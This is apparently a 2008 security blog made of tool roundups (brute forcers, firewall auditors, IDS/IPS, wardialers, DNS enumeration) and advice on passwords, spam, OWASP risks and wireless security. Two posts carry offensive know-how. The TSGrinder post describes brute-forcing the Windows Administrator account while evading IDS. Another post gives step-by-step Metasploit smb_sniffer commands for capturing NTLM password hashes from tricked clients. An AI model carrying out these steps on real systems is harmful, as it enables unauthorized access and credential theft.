7/23/08

Brute Force Tool for Terminal Services Server

This is a tool that has been around quite some time too, it’s still very useful though and it’s a very niche tool specifically for brute forcing Windows Terminal Server.

TSGrinder is the first production Terminal Server brute force tool, and is now in release 2. The main idea here is that the Administrator account, since it cannot be locked out for local logons, can be brute forced. And having an encrypted channel to the TS logon process sure helps to keep IDS from catching the attempts.

TSGringer is a “dictionary” based attack tool, but it does have some interesting features like “l337″ conversion, and supports multiple attack windows from a single dictionary file. It supports multiple password attempts in the same connection, and allows you to specify how many times to try a
username/password combination within a particular connection.

You can download TSGrinder 2.0.3 here:

tsgrinder-2.03.zip

Note that the tool requires the Microsoft Simulated Terminal Server Client tool, “roboclient,” which may be found here:

roboclient.zip

Or read more here.

7/17/08

Good Password Guidelines

It’s common sense for most people on the hacking side of computer security as we know how easy it is to break a password when it’s only a few characters long or it uses a dictionary word (even if it is postfixed with a couple of digits, a hybrid dictionary attack breaks it pretty fast).

Even more so if you are utilising some decent Rainbow Tables and the RainbowCrack method (time/memory trade-off).

The basics of creating a secure password:

  • Include punctuation marks (,.;), special characters (!#$%^) and numbers.
  • Mix capital (uppercase), lowercase and space characters.
  • Create a unique acronym.
  • Short passwords should be 8 chars at least.

Some potential weaknesses to avoid:

  • Don’t use a password that is listed as an example or public.
  • Don’t use the same password you have been using for years.
  • Don’t use a password someone else has seen you type.
  • Don’t use a password that contains personal information (names, birthdays or dates that are easily related to you)
  • Don’t use words or acronyms that can be found in a dictionary.
  • Don’t use keyboard patterns (qwerty) or sequential numbers (12345).

Once you have a good password it’s equally important to keep your password secure:

  • Never tell anyone your password or use it where someone can observe it.
  • Never send your password by email or say it where others may hear.
  • Occasionally verify your current password and change it to a new one.
  • Avoid writing your password down. (Keep it with you in a purse or wallet if you have to write down the password until you remember it.)

And never label that scrap of paper in any way, write it down on an the back of an old businesscard or something that doesn’t indicate it’s a password.

Don’t give anyone who finds (or gains access to) your purse/wallet any clue of what the password means or what it is related to.

128 bit entropy in a password requires a long randomized passphrase, which wouldn’t be very usable, there has to be a trade somewhere between security and usability.

You can also use online password generators such as http://makemeapassword.com/, the problem with these however, is that they do create strong passwords but they aren’t easy to remember, which kind of defeats the purpose.

Another thing you can do is use something like a password safe to keep all the hard to remember passwords in one place, the one I would recommend is from Bruce Schneier and is actually called “Password Safe”.

Password Safe is an Open Source (free) tool that allows you to have a different password for all the different programs and websites that you deal with, without actually having to remember all those usernames and passwords. Password Safe runs on PCs under Windows (95/98/NT/2000/XP).

You can find it here:

http://passwordsafe.sourceforge.net/

Any other inputs?

Digg This Article

Security Cloak - Mask Against TCP/IP Fingerprinting for Windows

Security Cloak is designed to protect against TCP/IP stack fingerprinting and computer identification/information leakage via timestamp and window options by modifying relevant registry keys. The settings used are based on the results of SYN packet analyization by p0f. While the OS reported by other OS detection scanners were not identical to those of p0f, testing against Nmap, xprobe2, queso and cheops showed that they were unable to identify the correct operating system/version after Security Cloak settings had been applied.

Note that in order to properly emulate some Operating Systems, the MTU must be changed. While most of these require the MTU to be 1500 (the default for most network connections),depending on your network connection, this could degrade/interfere with your connectivity, so be sure to check your current MTU before applying these changes. It is reccomended that you save all the original key values before using this program in the event that your computer responds negatively to the changes.

You can find the authors page here: http://www.craigheffner.com/security/

And a direct download here: Security Cloak

Browser Security Test - Check Your Browser NOW!

I know this is old, but a lot of people still don’t know about it.

It can test for up to date Mozilla, Opera and Internet Explorer flaws, exploits and vulnerabilities.

Browser vulnerabilities are a serious issue now.

You can see which vulnerabilities they test for here and the statistics of the tests results here.

Total tests finished: 739828
Tests that found high risk vulnerabilities: 219614
Tests that found only medium or low risk vulnerabilities: 82803
Tests that found only low risk vulnerabilities: 9493
Tests that found no vulnerabilities: 427918

The FAQ is here.

Check Your Browser Security Now

Network Device Configuration Security Auditing Tool

Nipper performs security audits of network device configuration files. The report produced by Nipper includes; detailed security-related issues with recommendations, a configuration report and various appendices. Nipper has a large number of configuration options which are described on this page.

Nipper currently supports the following device types:

  • Cisco Switches (IOS)
  • Cisco Routers (IOS)
  • Cisco Firewalls (PIX, ASA, FWSM)
  • Cisco Catalysts (NMP, CatOS, IOS)
  • Cisco Content Service Switches (CSS)
  • Juniper NetScreen Firewalls (ScreenOS)
  • CheckPoint Firewall-1 (FW1)
  • Nokia IP Firewalls (FW1)
  • Nortel Passport Devices
  • SonicWALL SonicOS Firewalls (SonicOS)

The security audit includes details of the findings, together with detailed recommendations. The security audit can be modified using command lineparameters or an external configuration file.

Network filtering audits include the following, all of which can be modified:

  • Rule lists end with a deny all and log
  • Rules allowing access from any source
  • Rules allowing access from network sources
  • Rules allowing access from any source port
  • Rules allowing access to any destination
  • Rules allowing access to destination networks
  • Rules allowing access to any destination service
  • Rules that do not log
  • Deny rules that do not log
  • Rules that are disabled
  • Rules that reject rather than drop
  • No bypass rules exist
  • Default rules

This update (0.11.5) includes improvements to support for Cisco PIX / ASA / FWSM firewalls, SonicWALL SonicOS firewalls, CheckPoint Firewall-1 and Nokia IP firewalls. It also includes a host of other updates.

The output from Nipper can be in HTML, Latex, XML or Text formats. Furthermore, Nipper will reverse any Cisco type-7 passwords identified, all other encrypted passwords can be output to a John-the-Ripper file for further strength testing. By default, input is retrieved from stdin and is output (in HTML format) to stdout.

Nipper is available for Linux, Windows and other platforms. You can download Nipper here:

Nipper 0.11.5

Or read more here.

FTester - Firewall Tester and IDS Testing tool

The Firewall Tester (FTester) is a tool designed for testing firewalls filtering policies and Intrusion Detection System (IDS) capabilities.

The tool consists of two perl scripts, a packet injector (ftest) and the listening sniffer (ftestd). The first script injects custom packets, defined in ftest.conf, with a signature in the data part while the sniffer listens for such marked packets. The scripts both write a log file which is in the same form for both scripts. A diff of the two produced files (ftest.log and ftestd.log) shows the packets that were unable to reach the sniffer due to filtering rules if these two scripts are ran on hosts placed on two different sides of a firewall. Stateful inspection firewalls are handled with the ‘connection spoofing’ option. A script called freport is also available for automatically parse the log files.

Of course this is not an automated process, ftest.conf must be crafted for every different situation. Examples and rules are included in the attached configuration file.

The IDS (Intrusion Detection System) testing feature can be used either with ftest only or with the additional support of ftestd for handling stateful inspection IDS, ftest can also use common IDS evasion techniques. Instead of using the configuration syntax currently the script can also process snort rule definition file.

Features:

  • Firewall testing
  • IDS testing
  • Simulation of real TCP connections for stateful inspection firewalls and IDS
  • Connection spoofing
  • IP fragmentation / TCP segmentation
  • IDS evasion techniques

Requirements:

The following PERL modules are required: Net::RawIP, Net::PcapUtils, NetPacket

You can download FTester here:

ftester-1.0.tar.gz

Or you can read more here.

A Simple Guide To Keeping Your Inbox Clean

In my opinion, the best way to keep clean of spam is simple:

The first rule is NEVER reply to spam, NEVER click the unsubscribe link and NEVER e-mail to the unsubscribe address.

These are simply underhand tactics to get ‘active’ e-mail addresses.

Some other tips to avoid getting spammed in the first place:

1) Never use your real e-mail address in newsgroups, this is the best place to get picked up by a spam bot. Use something like l33t-no-spam-at-i.hate.spam-darknet.org.uk

Then in your signature put remove -no-spam and i.hate.spam- to reply.

2) Never put your e-mail address on a publically viewable web page as it will be spidered by Google and grabbed by spammers.

If you do need to put an e-mail address use the simple JavaScript below to protect it:


3) If you do put your e-mail address anywhere try and obscure it in some way.

4) Create a disposable e-mail address (hotmail or yahoo) that you rarely check for signing up to Web-sites. Most commercial sites will bombard you with spam after you’ve signed up for whatever services they are offering. Some also sell your address to list makers or other spammer so never give your *real* e-mail address to anyone except people you want to e-mail you.

5) Don’t share your e-Mail address & Skip Compulsive Registration* This goes along with number 4, if possible don’t register, and if you do make sure you untick the ’spam me with a newsletter’ box.

Well 5) maybe a problem. Most of the times, a search on Google shows us a site with the answer to our problem, still, a big part of them requires registration (like Expertexchange)

That’s where BugMeNot comes into play.

BugMeNot is database of login information (usernames and passwords) that you can use to access a site that requires registration. The site has a voting mechanism that enables you to vote for the Username/Password that worked for you, making the login combination with most votes, the first on the list for a specific site.

You can also add new login information to the database for the sites you can’t find a login.

There is also a BugMeNot plugin for Firefox, that enables you to automatically enter the login information for a site, with a single click of the mouse.
The plugin was made for older versions of Firefox, and it has been reported not to work with most recent versions.

BugMeNot is not the solution for everything, and sometimes you need to ’share’ your e-Mail with others.

DEA - Disposable e-Mail Address - Allows you to share an e-Mail address on doubtful sites without the concern of that information being used to spam.

There are various sites providing DEA’s. Top 10 sites.

In my personal, and humble opinion, I suggest Mailinator and Wuzup Mail. Both of them supporting RSS.

Mailinator will create a random e-Mail address every time you refresh the site, which you can then use to register on the more doubtful sites.

WuzupMail let’s you choose your username and will save the e-Mail’s you receive for 7 day’s.

Using both BugMeNot for compulsive registration and DEA to prevent your personal information from being used to spam, you will reduce the amount of spam you get on your Inbox everyday (if you get any).

Also remember Thunderbird has some pretty good bayesian spam filtering built in, once it’s learn your e-mail pattern it’s very effective, if you are still getting spam you can try that.

* If you need to share your personal e-Mail address, do it in a creative way. Most web spiders - crawlers - are able to spot e-Mail’s like jon at doe dot com.

Be creative, jon at |NO_SPAM_PLEASE| dot com, etc, etc.

Digg This Article

Open Source Intrusion Prevention - HLBR

It’s good to see work on open source tools in the countermeasure department aswell as the attack and penetration arena.

It’s a shame since Snort and Nessus have gone semi-commercial.

I hope more people invest their time in good IDS, Firewall and IPS systems, I love things like IPCop and hope to see more products like HLBR.

HLBR is a brazilian project, started in november 2005, as a fork of the Hogwash project (started by Jason Larsen in 1996)

HLBR is an IPS (Intrusion Prevention System) that can filter packets directly in the layer 2 of the OSI model (so the machine doesn’t need even an IP address). Detection of malicious/anomalous traffic is done by rules based in signatures, and the user can add more rules. It is an efficient and versatile IPS, and it can even be used as bridge to honeypots and honeynets. Since it doesn’t make use of the operating system’s TCP/IP stack, it can be “invisible” to network access and attackers.

Since version 1.0, released in march 5th 2006, HLBR can use regular expressions to detect intrusion attempts, virus, worms, and phishing.

You can view the entire HLBR README file here.

Go to the HLBR Homepage for more information and downloads.

Source Code Analysis Risk Evaluation Tool

The Source Code Analysis Risk Evaluation project is a study to create a security complexity metric that will analyze source code and provide a realistic and factual representation of the potential of that source code to create a problematic binary. This metric will not say that the binary will be exploited nor does it do a static analysis for known limitations like vulnerabilities. However it will flag code for a particular interaction type or control and allow the developer to understand which Operational Security (OpSec) holes are not protected even if it can’t say the effectiveness of that protection at this time.

This computation will provide a final SCARE value, like the RAV, where 100% is the proper balance between controls to OpSec holes and no Limitations. Conversely, less than that shows an imbalance where too few Controls protect OpSec holes or Limitations in OpSec and Controls degrade the security.

The SCARE analysis tool is run against source code. Currently only C code is supported. The output file will contain all operational interactions possible which need controls (the current version does not yet say if and what controls are already there). At the bottom of the list are three numbers: Visibilities, Access, and Trusts. These 3 numbers can be plugged into the RAV Calculation spreadsheet available at http://www.isecom.org/ravs. The Delta value is then subtracted from 100 to give the SCARE percentage which indicates the complexity for securing this particular application. The lower the value, the worse the SCARE.

At this stage, the tool cannot yet tell which interactions have controls already or if those controls are applicable however once that is available it will change the RAV but not the SCARE. The SCARE will also not yet tell you where the bugs are in the code however if you are bug hunting, it will extract all the places where user inputs and trusts with user-accessible resources can be found in the code.

Currently, SCARE is designed to work for any programming language. While this methodology shows the C language, they need input and feedback from developers of other languages to expand this further.

If you are interested in helping with this project please contact ISECOM.

You can download SCARE here:

scare_analyst.zip

Or you can read more here.

Password Hasher Firefox Extension

Well seen as though we were talking about breaking passwords, here’s a tool for Firefox to help you manage your more secure passwords.

Better security without bursting your brain

Password Hasher is a Firefox security extension for generating site-specific strong passwords from one (or a few) master key(s).

What good security practice demands:

      Strong passwords that are hard to guess.
      Different passwords at each site.
      Periodically changing existing passwords.

Why you probably aren’t practicing good security:

      Strong passwords are difficult to remember.
      Juggling a multitude of passwords is a pain.
      Updating passwords compounds the memorization problem.


How Password Hasher helps:

  • Strong passwords are automatically generated.
  • The same master key produces different passwords at many sites.
  • You can quickly upgrade passwords by “bumping” the site tag.
  • You can upgrade the master key without updating all sites at once.
  • It supports different length passwords.
  • It supports special requirements, such as digit and punctuation characters.
  • All data is saved to the browser’s secure password database.

You can download Password Hasher here:

passhash-1.0.5.xpi

Or read more here.

Security Layer & Intrusion Detection for PHP Based Web Applications

Another protection for those building website and web applications, as it’s the the most common attack vector nowadays I think it’s important to be extra safe on this front.

PHPIDS (PHP-Intrusion Detection System) is a simple to use, well structured, fast and state-of-the-art security layer for your PHP based web application. The IDS neither strips, sanitizes nor filters any malicious input, it simply recognizes when an attacker tries to break your site and reacts in exactly the way you want it to. Based on a set of approved and heavily tested filter rules any attack is given a numerical impact rating which makes it easy to decide what kind of action should follow the hacking attempt.

This could range from simple logging to sending out an emergency mail to the development team, displaying a warning message for the attacker or even ending the user’s session.

PHPIDS enables you to see who’s attacking your site and how and all without the tedious trawling of logfiles or searching hacker forums for your domain. Last but not least it’s licensed under the LGPL!

It’s a fairly mature product with some good documentation (docs are here) and it’s easily to programmatically grab the latest version of the filter rules (it’s just an xml file).

You can see a demo here were you can try some injections or XSS and see the warnings.

http://demo.php-ids.org/

Download the latest version of PHPIDS here:

PHPIDS 0.4.6 zip
PHPIDS 0.4.6 tar.gz

There are other versons for Drupal and Wordpress on the download page.

Or read more here.

.NET Intrusion Detection System

This tool is another one on the side of protection, again for web-based applications but this time for .NET applications it’s called .NETIDS (.NET Intrusion detection System). This tool is capable of detecting on attacks on web applications and gives the developer the possibility to react. The project files include filter rules and function stubs to react on possible intrusions which may vary from logging to warning or redirecting the user.

The goal of this project is to provide am additional layer of protection to any .NET application this project is used with. This also includes the detection of XSS, directory traversal, SQL injections, protection against overwriting JS objects and methods, advanced logging functions, categorization and tagging of the single filter rules and interfaces for reacting on possible intrusions.

.NET IDS is a actually a port of PHPIDS, which we’ve mentioned before, to the .NET Framework. The library is fully CLS compliant and implements exactly the same filtering sets as the PHP version.

.NETIDS can be used in three ways.

The first method is by inheriting your ASP.NET pages from the SecurePage class. This offers an easy and customizable way to scan page input. If you are relatively new to the .NET Framework this is the simplest way to secure your applications.

The second method is more customizable but harder to implement for novice programmers and involves working directly with the IDS objects.

The third method (available in the upcoming release) is by using the supplied HttpModule.

You can find the documentation here:

http://www.the-mice.co.uk/dotnetids/docs/

You can download .NET IDS v.0.1.3.0 here:

dotnetids-bin-0_1_3_0.zip

Or you can read more here.

Python Advanced Wardialing System

Now this is an oldskool topic, wardialling! Some people still ask me about wardialling tools though, so here’s one I found recently written in Python.

PAW / PAWS is a wardialing software in python. It is designed to scan for ISDN (PAWS only) and “modern” analog modems (running at 9.6kbit/s or higher). Wardialing tools are - despite their martialic naming - used to find nonauthorized modems so one can disable those and as result make access to the internal network harder.

For PAW list all numbers you want to be dialed into the (text) file “dial.lst”, one in each line - numbers only, no spaces, plus signs, dashes or slashes please.

For PAWS the numbers are accompanied by the ISDN modes to be tested in the (text) file “dial.lst” in the exact format you find in the example file (you can delete individual ISDN types, though), one in each line - numbers only, no spaces, plus signs, dashes or slashes please. A syntax check of any kind is effectively non-existant, so be careful.

Make sure the device your modem is attached to is set correctly in paw.py in the variable “tty” at the top of the file.

Then simply call “./paw.py” or “./paws.py” and watch - a verbatim full log will be written into paw_dialing.log where CR, LF and TAB will be translated into readable equivalents. For PAW an additional summary will be written as CSV file in paw_dialing.csv

You can download PAW/PAWS here:

paw.tar.gz (analog wardialer only)

paws.tar.gz (ISDN & analog wardialing)

Or read more here.

Domain Information Gathering Tool

The first stage of penetration testing is usually passive information gathering and enumeration (active information gathering). This is where tools like dnsenum come in, the purpose of DNSenum is to gather as much information as possible about a domain.

The program currently performs the following operations:

  1. Get the host’s addresse (A record).
  2. Get the namservers (threaded).
  3. Get the MX record (threaded).
  4. Perform axfr queries on nameservers (threaded).
  5. Get extra names and subdomains via google scraping (google query = “allinurl: -www site:domain”).
  6. Brute force subdomains from file, can also perform recursion on subdomain that have NS records (all threaded).
  7. Calculate C class domain network ranges and perform whois queries on them (threaded).
  8. Perform reverse lookups on netranges ( C class or/and whois netranges) (threaded).
  9. Write to domain_ips.txt file ip-blocks.
The output file domain_ips.txt will contain non-contiguous IP blocks:

127.0.0.1/32
127.0.0.8/31

You can download DNSenum v1.2 here:

dnsenum1.2.tar.gz

Or you can read more here.

Security & System Auditing Tool for UNIX/Linux

Lynis is an auditing tool for Unix (specialists). It scans the system and available software, to detect security issues. Beside security related information it will also scan for general system information, installed packages and configuration mistakes.

This is a tool that might be useful for both penetration testers performing white box tests and system admins trying to secure their own systems.

This software aims in assisting automated auditing, software patch management, vulnerability and malware scanning of Unix based systems. It can be run without prior installation, so inclusion on read only storage is no problem (USB stick, CD/DVD).

What is Lynis NOT:
- Not a hardening tool: Lynis does not fix things automatically, it only reports (and makes suggestions).

Intended audience:
Security specialists, penetration testers, system auditors, system/network managers.

Examples of audit tests:

  • Available authentication methods
  • Expired SSL certificates
  • Outdated software
  • User accounts without password
  • Incorrect file permissions
  • Firewall auditing

You can download Lynis 1.1.7 here:

lynis-1.1.7.tar.gz

Or you can read more here.

Firewall Auditing & Ruleset Analyzer Tool

FWAuto (Firewall Rulebase Automation) is a Perl script and should work on any system with Perl installed. Provide the running config of a PIX firewall to fwauto. It will analyze and give you a list of weak rules in your rule base and store the result in multiple output files.

Maybe there have been times when you have pentested a firewall. As part of a grey box engagement you were assigned the task of auditing that HUGE firewall rulebase and were stuck on how to proceed, just because of the sheer volume of information. This tool in Perl is created to help in auditing a rulebase and helping you to narrow down on the weak rules. Current support is just for Cisco PIX though the framework was designed to scale across multiple firewalls and no major changes need to be made.

Updates

  • Outputs now available in reasonably neat HTML format
  • No more complex command line arguments, everything’s in a config file
  • More ports added in vulnerable ports section
  • Options available to obtain detailed/non detailed output

You can download fwauto v.1.1 here:

fwauto_v1.1.zip

Or read more here.

How to use Metasploit as a Man-in-the-Middle Password Stealer

> Requirements:

1.) Metasploit 2.7 on a Unix-based machine
2.) http://grutz.jingojango.net/exploits/smb_sniffer.pm


-> What we'r going to do:

So the basic idea of stealing passwords using Metasploit is to bind our malicious SMB Server to
port 139 and listen for incomming connections.For every request, the client uses the NTML Protocol to authenticate.

We will use the smb_sniffer, but it wont work without placing it in the Metasploit exploits/ directory.


-> Let's get it on:

So lets begin.
1.)Start Metasploit with root privleges -> sudo msfconsole
2.)Select the smb_sniffer -> use smb_sniffer
3.)Set the pw-File -> set PWFILE /tmp/password_file.txt
4.)Start out malicious SMB Service -> exploit
5.)So if there is an incoming request (either because we tricked or forced the client to do so)
it should look like this: "[*] New connection from -ip-"
6.)Look into the /tmp/password_file.txt file and voilà - there are the hashes.

7/13/08

10 Reasons websites get hacked.

Below you will find list of top 10 web vulnerabilities classified by OWASP, here is also description of the problem and some examples.

So here it starts:

1. Cross site scripting (XSS)

The problem: The most prevalent and pernicious Web application security vulnerability, XSS flaws happen when an application sends user data to a Web browser without first validating or encoding the content. This lets hackers execute malicious scripts in a browser, letting them hijack user sessions, deface Web sites, insert hostile content and conduct phishing and malware attacks.

Attacks are usually executed with JavaScript, letting hackers manipulate any aspect of a page. In a worst-case scenario, a hacker could steal information and impersonate a user on a bank s Web site, according to Snyder.

Real-world example: PayPal was targeted last year when attackers redirected PayPal visitors to a page warning users their accounts had been compromised. Victims were redirected to a phishing site and prompted to enter PayPal login information, Social Security numbers and credit card details. PayPal said it closed the vulnerability in June 2006.

How to protect users: Use a whitelist to validate all incoming data, which rejects any data that s not specified on the whitelist as being good. This approach is the opposite of blacklisting, which rejects only inputs known to be bad. Additionally, use appropriate encoding of all output data. Validation allows the detection of attacks, and encoding prevents any successful script injection from running in the browser, OWASP says.


2. Injection flaws

The problem: When user-supplied data is sent to interpreters as part of a command or query, hackers trick the interpreter which interprets text-based commands into executing unintended commands. Injection flaws allow attackers to create, read, update, or delete any arbitrary data available to the application, OWASP writes. In the worst-case scenario, these flaws allow an attacker to completely compromise the application and the underlying systems, even bypassing deeply nested firewalled environments.

Real-world example: Russian hackers broke into a Rhode Island government Web site to steal credit card data in January 2006. Hackers claimed the SQL injection attack stole 53,000 credit card numbers, while the hosting service provider claims it was only 4,113.

How to protect users: Avoid using interpreters if possible. If you must invoke an interpreter, the key method to avoid injections is the use of safe APIs, such as strongly typed parameterized queries and object relational mapping libraries, OWASP writes.


3. Malicious file execution

The problem: Hackers can perform remote code execution, remote installation of rootkits, or completely compromise a system. Any type of Web application is vulnerable if it accepts filenames or files from users. The vulnerability may be most common with PHP, a widely used scripting language for Web development.

Real-world example: A teenage programmer discovered in 2002 that Guess.com was vulnerable to attacks that could steal more than 200,000 customer records from the Guess database, including names, credit card numbers and expiration dates. Guess agreed to upgrade its information security the next year after being investigated by the Federal Trade Commission.

How to protect users: Don t use input supplied by users in any filename for server-based resources, such as images and script inclusions. Set firewall rules to prevent new connections to external Web sites and internal systems.


4. Insecure direct object reference

The problem: Attackers manipulate direct object references to gain unauthorized access to other objects. It happens when URLs or form parameters contain references to objects such as files, directories, database records or keys.

Banking Web sites commonly use a customer account number as the primary key, and may expose account numbers in the Web interface.

References to database keys are frequently exposed, OWASP writes. An attacker can attack these parameters simply by guessing or searching for another valid key. Often, these are sequential in nature.

Real-world example: An Australian Taxation Office site was hacked in 2000 by a user who changed a tax ID present in a URL to access details on 17,000 companies. The hacker e-mailed the 17,000 businesses to notify them of the security breach.

How to protect users: Use an index, indirect reference map or another indirect method to avoid exposure of direct object references. If you can t avoid direct references, authorize Web site visitors before using them


5. Cross site request forgery

The problem: Simple and devastating, this attack takes control of victim s browser when it is logged onto a Web site, and sends malicious requests to the Web application. Web sites are extremely vulnerable, partly because they tend to authorize requests based on session cookies or remember me functionality. Banks are potential targets.

Ninety-nine percent of the applications on the Internet are susceptible to cross site request forgery, Williams says. Has there been an actual exploit where someone s lost money? Probably the banks don t even know. To the bank, all it looks like is a legitimate transaction from a logged-in user.

Real-world example: A hacker known as Samy gained more than a million friends on MySpace.com with a worm in late 2005, automatically including the message Samy is my hero in thousands of MySpace pages. The attack itself may not have been that harmful, but it was said to demonstrate the power of combining cross site scripting with cross site request forgery. Another example that came to light one year ago exposed a Google vulnerability allowing outside sites to change a Google user s language preferences.

How to protect users: Don t rely on credentials or tokens automatically submitted by browsers. The only solution is to use a custom token that the browser will not remember, OWASP writes.

6. Information leakage and improper error handling

The problem: Error messages that applications generate and display to users are useful to hackers when they violate privacy or unintentionally leak information about the program s configuration and internal workings.

Web applications will often leak information about their internal state through detailed or debug error messages. Often, this information can be leveraged to launch or even automate more powerful attacks, OWASP says.

Real-world example: Information leakage goes well beyond error handling, applying also to breaches occurring when confidential data is left in plain sight. The ChoicePoint debacle in early 2005 thus falls somewhere in this category. The records of 163,000 consumers were compromised after criminals pretending to be legitimate ChoicePoint customers sought details about individuals listed in the company s database of personal information. ChoicePoint subsequently limited its sales of information products containing sensitive data.

How to protect users: Use a testing tool such as OWASP S WebScarab Project to see what errors your application generates. Applications that have not been tested in this way will almost certainly generate unexpected error output, OWASP writes.


7. Broken authentication and session management

The problem: User and administrative accounts can be hijacked when applications fail to protect credentials and session tokens from beginning to end. Watch out for privacy violations and the undermining of authorization and accountability controls.

Flaws in the main authentication mechanism are not uncommon, but weaknesses are more often introduced through ancillary authentication functions such as logout, password management, timeout, remember me, secret question and account update, OWASP writes.

Real-world example: Microsoft had to eliminate a vulnerability in Hotmail that could have let malicious JavaScript programmers steal user passwords in 2002. Revealed by a networking products reseller, the flaw was vulnerable to e-mails containing Trojans that altered the Hotmail user interface, forcing users to repeatedly reenter their passwords and unwittingly send them to hackers.

How to protect users: Communication and credential storage has to be secure. The SSL protocol for transmitting private documents should be the only option for authenticated parts of the application, and credentials should be stored in hashed or encrypted form.

Another tip: get rid of custom cookies used for authentication or session management.


8. Insecure cryptographic storage

The problem: Many Web developers fail to encrypt sensitive data in storage, even though cryptography is a key part of most Web applications. Even when encryption is present, it s often poorly designed, using inappropriate ciphers.

These flaws can lead to disclosure of sensitive data and compliance violations, OWASP writes.

Real-world example: The TJX data breach that exposed 45.7 million credit and debit card numbers. A Canadian government investigation faulted TJX for failing to upgrade its data encryption system before it was targeted by electronic eavesdropping starting in July 2005.

How to protect users: Don' t invent your own cryptographic algorithms. Only use approved public algorithms such as AES, RSA public key cryptography, and SHA-256 or better for hashing, OWASP advises.

Furthermore, generate keys offline, and never transmit private keys over insecure channels.


9. Insecure communications

The problem: Similar to No. 8, this is a failure to encrypt network traffic when it s necessary to protect sensitive communications. Attackers can access unprotected conversations, including transmissions of credentials and sensitive information. For this reason, PCI standards require encryption of credit card information transmitted over the Internet.

Real-world example: TJX again. Investigators believe hackers used a telescope-shaped antenna and laptop computer to steal data exchanged wirelessly between portable price-checking devices, cash registers and store computers, the Wall Street Journal reported.

The $17.4-billion retailer's wireless network had less security than many people have on their home networks, the Journal wrote. TJX was using the WEP encoding system, rather than the more robust WPA.

How to protect users: Use SSL on any authenticated connection or during the transmission of sensitive data, such as user credentials, credit card details, health records and other private information. SSL or a similar encryption protocol should also be applied to client, partner, staff and administrative access to online systems. Use transport layer security or protocol level encryption to protect communications between parts of your infrastructure, such as Web servers and database systems.


10. Failure to restrict URL access

The problem: Some Web pages are supposed to be restricted to a small subset of privileged users, such as administrators. Yet often there s no real protection of these pages, and hackers can find the URLs by making educated guesses. Say a URL refers to an ID number such as 123456. A hacker might say I wonder what s in 123457? Williams says.

The attacks targeting this vulnerability are called forced browsing, which encompasses guessing links and brute force techniques to find unprotected pages, OWASP says.

Real-world example: A hole on the Macworld Conference & Expo Web site this year let users get Platinum passes worth nearly $1,700 and special access to a Steve Jobs keynote speech, all for free. The flaw was code that evaluated privileges on the client but not on the server, letting people grab free passes via JavaScript on the browser, rather than the server.

How to protect users: Don t assume users will be unaware of hidden URLs. All URLs and business functions should be protected by an effective access control mechanism that verifies the user s role and privileges. Make sure this is done every step of the way, not just once towards the beginning of any multi-step process, OWASP advises.

What is spam?

Spam, unsolicited bulk advertising via email made its first appearance in the mid of 90s, i.e. as soon as lot of people were using email to make this a cost-effective form of advertising. By 1997, spam was considered as being a problem, and the first Real-Time Black List (RBL) appeared in the same year. Spammer techniques have developed in response to the appearance of more and better filters. As soon as security firms evolve effective filters, spammers change their tactics to avoid the new spam blockers. And it leads to a vicious circle, with spammers re-investing profits into developing new techniques to evade new spam filters. The situation is going out of control. In order to combat spam effectively it is essential to define exactly what spam is. Many people believe that spam is unsolicited email. However, this definition is not entirely correct. Spam is an anonymous, unsolicited bulk email.


Definition of spam in detail:

Anonymous real spam is sent with spoofed or harvested sender addresses to hide the actual sender. Real spam is sent in mass quantities. Spammers create money from the small percentage of recipients that actually respond, so for spam to be cost-effective, the initial mails have to be high-volume. Unsolicited mailing lists, newsletters and other advertising materials that end users have chosen to receive may resemble spam but are actually legitimate mail. In other words, the same piece of mail can be classed both as spam and legitimate mail depending on whether or not the user elected to receive it. It must be highlighted that the words 'advertising' and 'commercial' are not used to define spam. Many spam messages dont even advertise nor carry any type of commercial proposition. In addition to offering goods and services, spam mailings can be categorized into the following kinds. Political messages, Quasi-charity appeals, financial scams, Chain letters, Fake spam, Unsolicited but legitimate messages are the kinds. A legitimate commercial proposition, a charity appeal, an invitation addressed personally to an existing receiver or a newsletter can certainly be defined as unsolicited mail, but not as spam. Legitimate messages may also include delivery failure messages, misdirected messages, messages from system administrators or even messages from old friends who have earlier not corresponded with the recipient by email.


Conclusion:

Because unsolicited correspondence may be of interest to the recipient, a quality anti spam solution should be competent to distinguish between true spam i.e., unsolicited, bulk mailing and unsolicited correspondence. This kind of mail should be flagged as 'possible spam' so it can be reviewed or deleted at the recipient's comfort. Companies should have a spam guiding principle, with system administrators assessing the requirements of different departments. Access to different unsolicited mail folders should be given to different user groups support on this assessment. For instance, the travel manager may well want to read travel ads, whereas the HR department may wish to see all invitations to seminars and training sessions. At present, spammers usually use the last three methods in a variety of combinations. Many anti spam solutions are incompetent of detecting all. As long as spamming remains money-making, users with poor-quality anti spam software will continue to find their mailboxes clogged with advertising. So the above information tells us about spam and in brief its purposes.

Securing your wireless connection

Step one:

Out of the box your your wireless device shall broadcast itself as far as possible. Its there and it want to be found as easily as possible. First thing you want to do is change your Service Set Identifier (SSID). Anyone with a computer can find out default SSID. You may wonder why you need to do this. The answer is that Each wireless network node needs to be configured with the SSID name. The SSID is sent out in the header of each packet broadcast in the area. Data packets that lack the correct SSID will be rejected.

Step two:

Turn off the damn broadcasting of your SSID.

Step three:

Enable MAC address filtering. This will limit access to your wireless network based on the address on of the units NIC card. Basically your creating a white list containing accepted MAC addresses.


Step four:

Have the most up to date data encyption WPA2. Rather long explaination. Just know that its the most secure.

Step five:

When setting a password apply the same idea you would use for any other password. Upper and lowercase numbers and special charactors minimum of 8 chars.


Rise in SQL injection attacks exploiting unverified user data input

Microsoft is aware of a recent escalation in a class of attacks targeting Web sites that use Microsoft ASP and ASP.NET technologies but do not follow best practices for secure Web application development. These SQL injection attacks do not exploit a specific software vulnerability, but instead target Web sites that do not follow secure coding practices for accessing and manipulating data stored in a relational database. When a SQL injection attack succeeds, an attacker can compromise data stored in these databases and possibly execute remote code. Clients browsing to a compromised server could be forwarded unknowingly to malicious sites that may install malware on the client machine.

This vulnerability is not exploitable in Web applications that follow generally accepted best practices for secure Web application development by verifying user data input.

Microsoft has identified several tools to assist administrators. These tools cover detection, defense, and identifying possible coding which may be exploited by an attacker.
  • Detection – HP Scrawlr - Hewlett Packard has developed a free scanner which can identify whether sites are susceptible to SQL injection. This tool and support for its use can be found at Finding SQL Injection with Scrawlr.
  • Defense – UrlScan version 3.0 Beta - UrlScan version 3.0 Beta is a Microsoft security tool that restricts the types of HTTP requests that Internet Information Services (IIS) will process. By blocking specific HTTP requests, UrlScan helps prevent potentially harmful requests from reaching the Web application on the server. UrlScan 3.0 will install on IIS 5.1 and later, including IIS 7.0.
